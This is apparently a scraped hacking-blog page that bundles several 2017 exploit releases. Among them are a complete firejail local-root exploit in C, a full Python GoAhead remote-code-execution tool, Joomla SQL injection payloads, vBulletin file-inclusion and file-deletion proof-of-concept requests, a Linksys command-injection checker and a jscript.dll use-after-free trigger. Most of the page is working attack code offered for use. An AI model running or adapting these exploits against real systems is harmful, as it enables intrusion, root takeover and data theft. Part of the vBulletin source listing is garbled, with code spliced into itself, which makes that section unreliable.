/* firejail local root exploit (host to host)
*
* (C) 2017 Sebastian Krahmer under the GPL.
*
* WARNING: This exploit uses ld.so.preload technique.
* If you are in bad luck, you may end up with an unusable system.
* SO BE WARNED. ONLY TEST IT IN YOUR SAFE VM's.
*
* Get the beauty that this is a shared lib and a running
* executable at the same time, as we tamper with /etc/ld.so.preload
*
* Therefore you have to compile it like this:
*
* $ cc -fPIC -fpic -std=c11 -Wall -pedantic -c firenail.c
* $ gcc -shared -pie firenail.o -o firenail
* $ ./firenail
*
* DO NOT TELL ME THAT SELINUX WOULD HAVE PREVENTED THIS EXPLOIT.
* IF I WAS ABOUT TO BYPASS SELINUX ALONG, I WOULD HAVE DONE THE
* EXPLOIT DIFFERENTLY.
*
* Analysis: Sandboxing is cool, but it has to be done right.
* Firejail has too broad attack surface that allows users
* to specify a lot of options, where one of them eventually
* broke by accessing user-files while running with euid 0.
* There are some other similar races. Turns out that it can be
* _very difficult_ to create a generic sandbox suid wrapper thats
* secure but still flexible enough to sandbox arbitrary binaries.
*
* Tested with latest commit 699ab75654ad5ab7b48b067a2679c544cc8725f6.
*/
#define _POSIX_C_SOURCE 200212
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/types.h>
const char *const ldso = "/etc/ld.so.preload";
int main();
__attribute__((constructor)) void init(void)
{
if (geteuid())
return;
unlink(ldso);
char *sh[] = {"/bin/sh", "--noprofile", "--norc", NULL};
setuid(0);
setgid(0);
execve(*sh, sh, NULL);
exit(1);
}
void die(const char *s)
{
perror(s);
exit(errno);
}
int main()
{
printf("[*] fire(j|n)ail local root exploit 2017\n\n");
char me[4096] = {0}, *home = getenv("HOME");
if (!home)
die("[-] no $HOME");
if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0)
die("[-] Unable to find myself");
char path[256] = {0};
snprintf(path, sizeof(path) - 1, "%s/.firenail", home);
if (mkdir(path, 0700) < 0 && errno != EEXIST)
die("[-] mkdir");
snprintf(path, sizeof(path) - 1, "%s/.firenail/.Xauthority", home);
if (symlink(ldso, path) < 0 && errno != EEXIST)
die("[-] symlink");
system("firejail --private=.firenail /usr/bin/id");
int fd = open(ldso, O_RDWR|O_TRUNC);
if (fd < 0)
die("[-] open");
write(fd, me, strlen(me));
write(fd, "\n", 1);
close(fd);
char *su[] = {"/bin/su", NULL};
execve(*su, su, NULL);
die("[-] execve su");
return -1;
}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863552974
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# # # # #
# Exploit Title: Joomla! Component My Projects 2.0 - SQL Injection
# Dork: N/A
# Date: 18.12.2017
# Vendor Homepage: http://www.gegabyte.org/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/portfolio/my-projects/
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php/component/myproject/VerAyari[SQL]
#
# 'and%20(select%201%20from%20(select%20count(*)%2cconcat((select(select%20concat(cast(database()%20as%20char)%2c0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20AND%20''='
#
# # # # #
#!/usr/bin/python
# GoAhead httpd/2.5 to 3.6.5 LD_PRELOAD remote code execution exploit
# EDB Note: Payloads ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43360.zip
# EDB Note: Source ~ https://www.elttam.com.au/blog/goahead/
# EDB Note: Source ~ https://github.com/elttam/advisories/blob/c778394dfe454083ebdfb52f660fd3414ee8adb8/CVE-2017-17562/
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#+++++++++++++++++++++++++++++++++++:--/++++++++++++++++++++++++++++++++++++
#+++++++++++++++++++++++++++++++/:-......-:/++++++++++++++++++++++++++++++++
#++++++++++++++++++++++/////::-..............-:://///+++++++++++++++++++++++
#++++++++++++++++++++++..............-:..............+++++++++++++++++++++++
#++++++++++++++++++++++..........-://+++/:-..........+++++++++++++++++++++++
#++++++++++++++++++++++......://++++++++++++//::.....+++++++++++++++++++++++
#++++++++++++++++++++++......++++++++++++++++++/.....+++++++++++++++++++++++
#++++++++++++++++++++++......:/+++++++++++++++/-.....+++++++++++++++++++++++
#++++++++++++++++++++++.........--::////:::--........+++++++++++++++++++++++
#++++++++++++++++++++++-...........................:/+++++++++++++++++++++++
#++++++++++++++++++++++:.....-................--:/++++++++++++++++++++++++++
#+++++++++++++++++++++++-....-+///::::::::///+++++++++++++++++++++++++++++++
#+++++++++++++++++++++++/.....-/++++++++++++++++/::+++++++++++++++++++++++++
#++++++++++++++++++++++++/-.....-/++++++++/:--...-/+++++++++++++++++++++++++
#++++++++++++++++++++++++++:.......:/++/:.......:+++++++++++++++++++++++++++
#+++++++++++++++++++++++++++/-................-/++++++++++++++++++++++++++++
#+++++++++++++++++++++++++++++/:-..........-:/++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++/:--..--:/+++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++(c) 2017 elttam Pty Ltd.+++
# ~/goahead_exploit>>> ./makemyday.py -h
# usage: makemyday.py [-h] [--server SERVER] [--port PORT] [--maxconn {1-256}]
# [--verbose]
# {fingerprint,stage,exploit,findcgi} ...
#
# GoAhead httpd remote LD_PRELOAD exploit.
#
# positional arguments:
# {fingerprint,stage,exploit,findcgi}
# fingerprint fingerprint if GoAhead server uses CGI
# stage send a staging payload and wait indefinitely
# exploit run exploit
# findcgi brute force cgi script names
#
# optional arguments:
# -h, --help show this help message and exit
# --server SERVER target ip or hostname, default is localhost
# --port PORT target port, default is 80
# --maxconn {1-256} max concurrent requests, default is 1
# --verbose, -v increase verbosity level
#
# See https://www.elttam.com.au for more information.
# >>>./makemyday.py --server 192.168.1.24 --port 80 exploit --payload ./payloads/X86_64-hw.so
# exploit works!
import argparse
import httplib
import sys
import threading
from string import Template
class GoAheadExploit(object):
'''GoAheadExploit'''
qid = None
payload = None
exploited = False
def __init__(self):
'''Configure arguments and run the exploit'''
parser = argparse.ArgumentParser(
description="GoAhead httpd remote LD_PRELOAD exploit.",
epilog="See https://www.elttam.com.au for more information."
)
parser.add_argument('--server', default="localhost",
help='target ip or hostname, default is localhost')
parser.add_argument('--port', type=int, default=80,
help='target port, defaults is 80')
parser.add_argument('--maxconn', type=int, default=1, choices=xrange(1, 256),
metavar="{1-256}", help='max concurrent requests, default is 1')
parser.add_argument('--verbose', '-v', default=0, action='count',
help='increase verbosity level')
common_options = argparse.ArgumentParser(add_help=False)
common_options.add_argument('--cginame', default="cgitest",
help='target cgi script')
common_options.add_argument('--payload', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='shared object file to execute (defaults to stdin)')
cmd_subparsers = parser.add_subparsers(dest="action")
cmd_subparsers.add_parser(
'fingerprint', help='fingerprint if GoAhead server uses CGI')
cmd_subparsers.add_parser('stage', parents=[common_options],
help='send a staging payload and wait indefinitely')
cmd_subparsers.add_parser('exploit', parents=[common_options],
help='run exploit')
findcgi = cmd_subparsers.add_parser(
'findcgi', help='brute force cgi script names')
findcgi.add_argument('--wordlist', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='list of cgi filenames to brute force (defaults to stdin)')
# parse command line and call into action
self.args = parser.parse_args()
getattr(self, self.args.action)()
def fingerprint(self):
'''fingerprint'''
conn = httplib.HTTPConnection(self.args.server, self.args.port)
conn.connect()
conn.request(
"GET", "/cgi-bin/c8fed00eb2e87f1cee8e90ebbe870c190ac3848c")
if conn.getresponse().read().find("CGI process file does not exist") != -1:
print "CGI scripting is enabled"
else:
print "CGI scripting is disabled"
conn.close()
def findcgi(self):
'''findcgi'''
for cginame in self.args.wordlist.readlines():
cginame = cginame[:-1]
conn = httplib.HTTPConnection(self.args.server, self.args.port)
conn.connect()
conn.request("GET", "/cgi-bin/" + cginame)
resp = conn.getresponse()
if resp.status == 200:
print "/cgi-bin/" + cginame + " exists."
conn.close()
def stage(self):
'''stage'''
payload = self.args.payload.read()
headers = {"Host": self.args.server,
"User-Agent": "curl/7.51.0",
"Accept": "*/*",
"Content-Length": str(len(payload) + 1)}
conn = httplib.HTTPConnection(self.args.server, self.args.port)
conn.connect()
conn.request("POST", "/cgi-bin/" + self.args.cginame, payload, headers)
try:
conn.getresponse()
except httplib.BadStatusLine:
pass
conn.close()
def exploit(self):
'''exploit'''
for _ in range(0, self.args.maxconn):
tid = threading.Thread(self.do_exploit(verify,))
tid.start()
def do_exploit(self, verify_callback):
'''do_exploit'''
if not self.payload:
self.payload = self.args.payload.read()
contentlen = len(self.payload)
headers = {"Host": self.args.server,
"User-Agent": "curl/7.51.0",
"Accept": "*/*",
"Content-Length": str(contentlen)}
exploit_string = Template("/cgi-bin/${cginame}?LD_PRELOAD="
"/proc/self/fd/0").substitute({
"cginame": self.args.cginame
})
while not self.exploited:
conn = httplib.HTTPConnection(self.args.server, self.args.port, timeout=10)
conn.connect()
conn.request("POST", exploit_string, self.payload, headers)
try:
if verify_callback(conn.getresponse()):
self.exploited = True
print "exploit works!"
except httplib.BadStatusLine:
pass
conn.close()
# put your payload callback/verification code here
def verify(res):
'''validation callback'''
if res.getheader("hello"):
return True
return False
if __name__ == '__main__':
GoAheadExploit()
# SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution
Source: https://blogs.securiteam.com/index.php/archives/3569
## Vulnerability Summary
The following advisory describes a unauthenticated file inclusion vulnerability that leads to remote code execution found in vBulletin version 5.
vBulletin, also known as vB, is a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including Fortune 500 and Alexa Top 1M companies websites and forums. According to the latest W3Techs1 statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while version 3 and 5 divide the remaining percentage
## Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
## Vendor response
We tried to contact vBulletin since November 21 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.
## Vulnerability details
vBulletin contains a vulnerability that can allow a remote attacker to include any file from the vBulletin server and execute arbitrary PHP code.
An unauthenticated user is able to send a GET request to /index.php which can then trigger the file inclusion vulnerability with parameter routestring=.
The request allows an attacker to create a crafted request to Vbulletin server installed on Windows OS and include any file on the web server.
**Listing of /index.php:**
```
/* 48 */ $app = vB5_Frontend_Application::init('config.php');
/* 49 */ //todo, move this back so we can catch notices in the startup code. For now, we can set the value in the php.ini
/* 50 */ //file to catch these situations.
/* 51 */ // We report all errors here because we have to make Application Notice free
/* 52 */ error_reporting(E_ALL | E_STRICT);
/* 53 */
/* 54 */ $config = vB5_Config::instance();
/* 55 */ if (!$config->report_all_php_errors) {
/* 56 */ // Note that E_STRICT became part of E_ALL in PHP 5.4
/* 57 */ error_reporting(E_ALL & ~(E_NOTICE | E_STRICT));
/* 58 */ }
/* 59 */
/* 60 */ $routing = $app->getRouter();
/* 61 */ $method = $routing->getAction();
/* 62 */ $template = $routing->getTemplate();
/* 63 */ $class = $routing->getControllerClass();
/* 64 */
/* 65 */ if (!class_exists($class))
/* 66 */ {
/* 67 */ // @todo - this needs a proper error message
/* 68 */ die("Couldn't find controller file for $class");
/* 69 */ }
/* 70 */
/* 71 */ vB5_Frontend_ExplainQueries::initialize();
/* 72 */ $c = new $class($template);
/* 73 */
/* 74 */ call_user_func_array(array(&$c, $method), $routing->getArguments());
/* 75 */
/* 76 */ vB5_Frontend_ExplainQueries::finish();
```
**Let’s take a closer look on vB5_Frontend_Application::init() – Listing of /includes/vb5/frontend/application.php:**
```
/* 15 */ public static function init($configFile)
/* 16 */ {
/* 17 */ parent::init($configFile);
/* 18 */
/* 19 */ self::$instance = new vB5_Frontend_Application();
/* 20 */ self::$instance->router = new vB5_Frontend_Routing();
/* 21 */ self::$instance->router->setRoutes();
/* ... */
```
We can see that setRoutes() is called:
**Listing of /includes/vb5/frontend/routing.php:**
```
/* 47 */ public function setRoutes()
/* 48 */ {
/* 49 */ $this->processQueryString();
/* 50 */
/* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it
/* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : '';
/* 53 */
/* 54 */ if (isset($_GET['routestring']))
/* 55 */ {
/* 56 */ $path = $_GET['routestring'];
/* ... */
/* 73 */ }
/* 74 */
/* 75 */ if (strlen($path) AND $path{0} == '/')
/* 76 */ {
/* 77 */ $path = substr($path, 1);
/* 78 */ }
/* 79 */
/* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them
/* 81 */ if (strlen($path) > 2 )
/* 82 */ {
/* 83 */ $ext = strtolower(substr($path, -4)) ;
/* 84 */ if (($ext == /* 47 */ public function setRoutes()
/* 48 */ {
/* 49 */ $this->processQueryString();
/* 50 */
/* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it
/* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : '';
/* 53 */
/* 54 */ if (isset($_GET['routestring']))
/* 55 */ {
/* 56 */ $path = $_GET['routestring'];
/* ... */
/* 73 */ }
/* 74 */
/* 75 */ if (strlen($path) AND $path{0} == '/')
/* 76 */ {
/* 77 */ $path = substr($path, 1);
/* 78 */ }
/* 79 */
/* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them
/* 81 */ if (strlen($path) > 2 )
/* 82 */ {
/* 83 */ $ext = strtolower(substr($path, -4)) ;
/* 84 */ if (($ext == '.gif') OR ($ext == '.png') OR ($ext == '.jpg') OR ($ext == '.css')
/* 85 */ OR (strtolower(substr($path, -3)) == '.js') )
/* 86 */ {
/* 87 */ header("HTTP/1.0 404 Not Found");
/* 88 */ die('');
/* 89 */ }
/* 90 */ }
/* 91 */
/* 92 */ try
/* 93 */ {
/* 94 */ $message = ''; // Start with no error.
/* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING']));
/* 96 */ }
/* 97 */ catch (Exception $e)
/* 98 */ {
/* ... */
/* 106 */ }
/* ... */
/* 127 */ if (!empty($route))
/* 128 */ {
/* ... */
/* 188 */ }
/* 189 */ else
/* 190 */ {
/* 191 */ // if no route was matched, try to parse route as /controller/method
/* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/'));
/* ... */
/* 229 */ }
/* 230 */
/* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle
/* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll
/* 233 */ //handle deeper paths via more standard routes.
/* 234 */ if (strpos($path, '/') === false)
/* 235 */ {
/* 236 */ $this->controller = 'relay';
/* 237 */ $this->action = 'legacy';
/* 238 */ $this->template = '';
/* 239 */ $this->arguments = array($path);
/* 240 */ $this->queryParameters = array();
/* 241 */ return;
/* 242 */ }
/* 243 */
/* 244 */ vB5_ApplicationAbstract::checkState();
/* 245 */
/* 246 */ throw new vB5_Exception_404("invalid_page_url");
/* 247 */ } ) )
/* 86 */ {
/* 87 */ header("HTTP/1.0 404 Not Found");
/* 88 */ die('');
/* 89 */ }
/* 90 */ }
/* 92 */ try
/* 93 */ {
/* 94 */ $message = ''; // Start with no error.
/* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING']));
/* 96 */ }
/* 97 */ catch (Exception $e)
/* 98 */ {
/* ... */
/* 106 */ }
/* ... */
/* 127 */ if (!empty($route))
/* 128 */ {
/* ... */
/* 188 */ }
/* 189 */ else
/* 190 */ {
/* 191 */ // if no route was matched, try to parse route as /controller/method
/* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/'));
/* ... */
/* 229 */ }
/* 230 */
/* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle
/* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll
/* 233 */ //handle deeper paths via more standard routes.
/* 234 */ if (strpos($path, '/') === false)
/* 235 */ {
/* 236 */ $this->controller = 'relay';
/* 237 */ $this->action = 'legacy';
/* 238 */ $this->template = '';
/* 239 */ $this->arguments = array($path);
/* 240 */ $this->queryParameters = array();
/* 241 */ return;
/* 242 */ }
/* … */
```
So if our routestring does not end with ‘.gif’, ‘.png’, ‘.jpg’, ‘.css’ or ‘.js’ and does not contain ‘/’ char vBulletin will call legacy() method from vB5_Frontend_Controller_Relay – /includes/vb5/frontend/controller/relay.php:
```
/* 63 */ public function legacy($file)
/* 64 */ {
/* 65 */ $api = Api_InterfaceAbstract::instance();
/* 66 */ $api->relay($file);
/* 67 */ }
```
If we will check relay() from Api_Interface_Collapsed class – /include/api/interface/collapsed.php:
```
/* 117 */ public function relay($file)
/* 118 */ {
/* 119 */ $filePath = vB5_Config::instance()->core_path . '/' . $file;
/* 120 */
/* 121 */ if ($file AND file_exists($filePath))
/* 122 */ {
/* 123 */ //hack because the admincp/modcp files won't return so the remaining processing in
/* 124 */ //index.php won't take place. If we better integrate the admincp into the
/* 125 */ //frontend, we can (and should) remove this.
/* 126 */ vB_Shutdown::instance()->add(array('vB5_Frontend_ExplainQueries', 'finish'));
/* 127 */ require_once($filePath);
/* 128 */ }
/* ... */
```
As we could see an attacker is not able to use ‘/’ in the $file so he cannot change current directory on Linux. But for Windows he can use ‘\’ as path delimiter and is able to specify any desired file (he can use ‘\..\’ trick as well) and it will be included by php.
If we want to include file with extension like ‘.gif’, ‘.png’, ‘.jpg’, ‘.css’ or ‘.js’ we will need to bypass the mentioned check in setRoutes() method. This can be easily done by adding dot (‘.’) or space (‘%20’) to the filename.
## Proof of Concept
We can check if the server is vulnerable by sending the following GET request:
```
/index.php?routestring=.\\
```
If the response is:
The server is vulnerable.
If we want to inject a php code to any file on the server we can use the access.log for example:
```
/?LogINJ_START=<?php phpinfo();?>LogINJ_END
```
After that we can include access.log with our PHP code:
```
/index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log
```
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Nixawk
# CVE-2017-17411
# Linksys WVBR0 25 Command Injection
"""
$ python2.7 exploit-CVE-2017-17411.py
[*] Usage: python exploit-CVE-2017-17411.py <URL>
$ python2.7 exploit-CVE-2017-17411.py http://example.com/
[+] Target is exploitable by CVE-2017-17411
"""
import requests
def check(url):
payload = '"; echo "admin'
md5hash = "456b7016a916a4b178dd72b947c152b7" # echo "admin" | md5sum
resp = send_http_request(url, payload)
if not resp:
return False
lines = resp.text.splitlines()
sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines)
if not any([payload in sys_cmd for sys_cmd in sys_cmds]):
return False
if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]):
return False
print("[+] Target is exploitable by CVE-2017-17411 ")
return True
def send_http_request(url, payload):
headers = {
'User-Agent': payload
}
response = None
try:
response = requests.get(url, headers=headers)
except Exception as err:
log.exception(err)
return response
if __name__ == '__main__':
import sys
if len(sys.argv) != 2:
print("[*] Usage: python %s <URL>" % sys.argv[0])
sys.exit(0)
check(sys.argv[1])
# google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US"
## References
# https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
# https://thehackernews.com/2017/12/directv-wvb-hack.html
# SSD Advisory – vBulletin cacheTemplates Unauthenticated Remote Arbitrary File Deletion
Source: https://blogs.securiteam.com/index.php/archives/3573
## Vulnerability Summary
The following advisory describes a unauthenticated deserialization vulnerability that leads to arbitrary delete files and, under certain circumstances, code execution found in vBulletin version 5.
vBulletin, also known as vB, is “a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including Fortune 500 and Alexa Top 1M companies websites and forums. According to the latest W3Techs1 statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while version 3 and 5 divide the remaining percentage”.
## Credit
A security researcher from, TRUEL IT ( @truel_it ), has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
## Vendor response
We tried to contact vBulletin since November 21 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.
CVE: CVE-2017-17672
## Vulnerability details
Unsafe usage of PHP’s unserialize() on user-supplied input allows an unauthenticated attacker to delete arbitrary files and, under certain circumstances, execute arbitrary code on a vBulletin installation.
vB_Library_Template’s cacheTemplates() function, which is an publicly exposed API which allows to fetch information on a set of given templates from the database in order to store them inside a cache variable.
File core/vb/api/template.php – function cacheTemplates():
```
public function cacheTemplates($templates, $templateidlist, $skip_bbcode_style = false,
$force_set = false)
{
return vB_Library::instance('template')->cacheTemplates($templates, $templateidlist, $skip_bbcode_style, $for
```
Let’s take a look at $templateidlist – core/vb/library/template.php – function cacheTemplates():
````
public function cacheTemplates($templates, $templateidlist, $skip_bbcode_style = false,
$force_set = false)
{
$vboptions = vB::getDatastore()
// vB_Library_Style::switchCssStyle() may pass us a templateidlist that's already unserialized.
if (!is_array($templateidlist))
{
$templateidlist = unserialize($templateidlist);
}
foreach ($templates AS $template)
{
if (isset($templateidlist[$template]))
{
$templateids[] = intval($templateidlist[$template]);
}
}
if (!empty($templateids))
{
$temps = vB::getDbAssertor(array('title', 'textonly', 'template_un', 'template'));
// cache templates
foreach ($temps as $temp)
{
if (empty(self::$templatecache["$temp[title]"]) OR $force_set)
{
self::$templatecache["$temp[title]"] = $this;
}
}
}
if (!$skip_bbcode_style)
{
self::$bbcode_style = array(
'code' => &$templateassoc['bbcode_code_styleid'],
'html' => &$templateassoc['bbcode_html_styleid'],
'php' => &$templateassoc['bbcode_php_styleid'],
'quote' => &$templateassoc['bbcode_quote_styleid']
);
}
}
```
$temnplateidlist variable, which can come directly from user-input, is directly supplied to unserialize(), resulting in an arbitrary deserialization primitive.
## Proof of Concept
By sending the following POST request an unauthenticated attacker can delete files from the victims server
```
POST /vb533/ajax/api/template/cacheTemplates HTTP/1.1
Host: vb533.test
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
templates[]=1&templateidlist=O:20:"vB_Image_ImageMagick":1:{s:20:"%00*%00imagefilelocation";s:13:"/path/to/file";}
```
The server then will respond with:
```
HTTP/1.1 200 OK
Date: Fri, 27 Oct 2017 09:27:52 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: sessionhash=409d8f4b16ebb55471e63509834d0eff; path=/; HttpOnly
Set-Cookie: lastvisit=1509096472; path=/; HttpOnly
Set-Cookie: lastactivity=1509096472; path=/; HttpOnly
Set-Cookie: sessionhash=44b1e8d2d433031ec2501649630dd8bf; path=/; HttpOnly
Cache-Control: max-age=0,no-cache,no-store,post-check=0,pre-check=0
Expires: Sat, 1 Jan 2000 01:00:00 GMT
Last-Modified: Fri, 27 Oct 2017 09:27:52 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2101
Connection: close
Content-Type: application/json; charset=UTF-8
{"errors":[["unexpected_error","Cannot use object of type vB_Image_ImageMagick as array"]]}
```
# # # # #
# Exploit Title: Joomla! Component NextGen Editor 2.1.0 - SQL Injection
# Dork: N/A
# Date: 19.12.2017
# Vendor Homepage: hhttp://nextgeneditor.com/
# Software Link: https://extensions.joomla.org/extension/nextgen-editor/
# Software Download: http://nextgeneditor.com/index.php/en/testcategory/send/2-nge-editor-full/33-nextgeneditor-full-free
# Version: 2.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_nge&view=config&plname=[SQL]
#
# %22%20%20%2f%2a%21%30%37%37%37%37%50%72%6f%63%65%64%75%72%65%2a%2f%20%2f%2a%21%30%37%37%37%37%41%6e%61%6c%79%73%65%2a%2f%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%2800%2c%2f%2a%21%30%37%37%37%37%63%6f%6e%63%61%74%2a%2f%280x27%2c0x496873616e2053656e63616e%2c0x3a%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c0%29%2d%2d%20%2d
#
# # # # #
# Exploit Title: BrightSign Digital Signage (Multiple Vulnerabilities)
# Date: 12/15/17
# Exploit Author: singularitysec@gmail.com
# Vectors: XSS, Directory Traversal, File Modification, Information Leakage
The BrightSign Digital Signage (4k242) device (Firmware 6.2.63 and below)
suffers from multiple vulnerabilities.
The pages:
/network_diagnostics.html
/storage_info.html
Suffer from a Cross-Site Scripting vulnerability. The REF parameter for
these pages do not sanitize user input, resulting in arbitrary execution,
token theft and related attacks.
The RP parameter in STORAGE.HTML suffers from a directory
traversal/information leakage weakness:
/storage.html?rp=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc
Through parameter manipulation, the file system can be traversed,
unauthenticated, allowing for leakage of information and compromise of the
device.
This page also allows for unauthenticated upload of files.
/tools.html
Page allows for unauthenticated rename/manipulation of files.
When combined, these vulnerabilities allow for compromise of both end users
and the device itself.
Ex. A malicious attacker can upload a malicious page of their choosing and
steal credentials, host malicious content or distribute content through the
device, which accepts large format SD cards.
# TeamViewer Permissions Hook V1
---
[](https://github.com/gellin/TeamViewer_Permissions_Hook_V1/blob/master/LICENSE)
**A proof of concept injectable C++ DLL, that uses naked inline hooking and direct memory modification to change TeamViewer permissions.**
## Features
* **As the Server** - Enables extra menu item options on the right side pop-up menu. Most useful so far to enable the "switch sides" feature which is normally only active after you have already authenticated control with the client, and initiated a change of control/sides.
* **As the Client** - Allows for control of mouse with disregard to servers current control settings and permissions.
## Demo
#### As the Server
#### Client
## Rundown
* Utilizes signature/pattern scanning to dynamically locate key parts in the code at which the assembly registers hold pointers to interesting classes. Applies inline naked hooks a.k.a code caves, to hi-jack the pointers to use for modification via direct memory access to their reversed classes.
* Inject and follow the steps
## Requirements
* Your favorite Manual Mapper, PE Loader, DLL Injector, inject into - "TeamViewer.exe"
* This version was Built on Windows 10, for TeamViewer x86 Version 13.0.5058 - (Other versions of TeamViewer have not been tested but with more robust signatures it may work, linux not supported)
## Disclaimer
* Developed for educational purposes as a proof of concept for testing. I do not condone the or support the use of this software for unethical or illicit purposes. No responsibility is held or accepted for misuse.
## Credit
[@timse93](https://github.com/timse93) - Research and Testing
## EDB-Note
Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43366.zip
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1376
There is a use-after-free vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:
- An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service.
- The issue can also be exploited by opening a malicious web page in Internet Explorer.
The issue has been verified on 64-bit Win7 with the most recent patches applied.
PoC for Internet Explorer (might require page heap to trigger the crash):
============================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
var vars = new Array(100);
for(var i=0;i<100;i++) vars[i] = {};
function f() {
vars[1] = 1;
CollectGarbage();
return {};
}
vars[1].toString = f;
Array.prototype.join.call(vars);
</script>
<!--
============================================
PoC for WPAD (might require page heap to trigger the crash):
============================================
function FindProxyForURL(url, host) {
var vars = new Array(100);
for(var i=0;i<100;i++) vars[i] = {};
function f() {
vars[1] = 1;
CollectGarbage();
return {};
}
vars[1].toString = f;
Array.prototype.join.call(vars);
return "DIRECT";
}
===========================================
Technical details:
The issue is in NameTbl::GetValDef which is called when an object is converted to a string. The function attempts to call toString() or valueOf() of the NameTbl object 2 times or until the return value isn't an JavaScript object. The issue is that the NameTbl object on which these methods are called isn't explicitly tracked by the garbage collector, which means the object can be deleted inside the toString/valueOf callback (as long as it's not tracked by the garbage collector somewhere else). Basically, toString/valueOf can delete its 'this' object.
Note that the crash location in the Debug log immediately precedes a virtual method call.
Debug log (from IE, but it looks similar in the WPAD service):
============================================
(a68.e4c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
